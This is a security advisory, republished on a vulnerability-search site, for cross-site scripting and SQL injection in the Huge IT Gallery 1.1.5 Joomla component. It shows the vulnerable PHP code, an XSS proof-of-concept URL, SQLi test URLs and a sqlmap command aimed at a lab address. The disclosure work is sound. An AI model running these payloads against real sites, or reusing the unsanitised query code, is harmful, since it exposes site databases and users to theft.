Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Joomla Huge IT Gallery 1.1.5 Cross Site Scripting / SQL Injection

Related Vulnerabilities: CVE-2016-1000113  
Publish Date: 24 Jul 2016
Author: Larry W. Cashdollar, Elitza Neytcheva
Source 
                							

                Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Author: Larry W. Cashdollar, @_larry0 Elitza Neytcheva, @E1337za 
Date: 2016-07-14
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed v1.1.6
Vendor Contact: info@huge-it.com
Advisory: http://www.vapidlabs.com/advisory.php?v=164
Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.
Vulnerability:
The attacker does not need to be logged in to Joomla to exploit this vulnerability:

SQL in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
51     public function getPropertie() {
52         $db = JFactory::getDBO();
53         $id_cat = JRequest::getVar('id');
54         $query = $db->getQuery(true);
55         $query->select('#__huge_itgallery_images.name as name,'
56                 . '#__huge_itgallery_images.id ,'
57                 . '#__huge_itgallery_gallerys.name as portName,'
58                 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg    allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59         $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg    allery_images'));
60         $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
61         $query->order('ordering desc');
62 
64         $db->setQuery($query);
65         $results = $db->loadObjectList();
66         return $results;
67     }

XSS is here:

root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;
256:                    <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >
CVE-2016-1000113
Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
 
SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE

http://192.168.0.125/index.php?option=com_gallery&id=HERE

Video by 'Exploiter':
https://www.youtube.com/watch?v=U67iQ3-xcho
 
$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started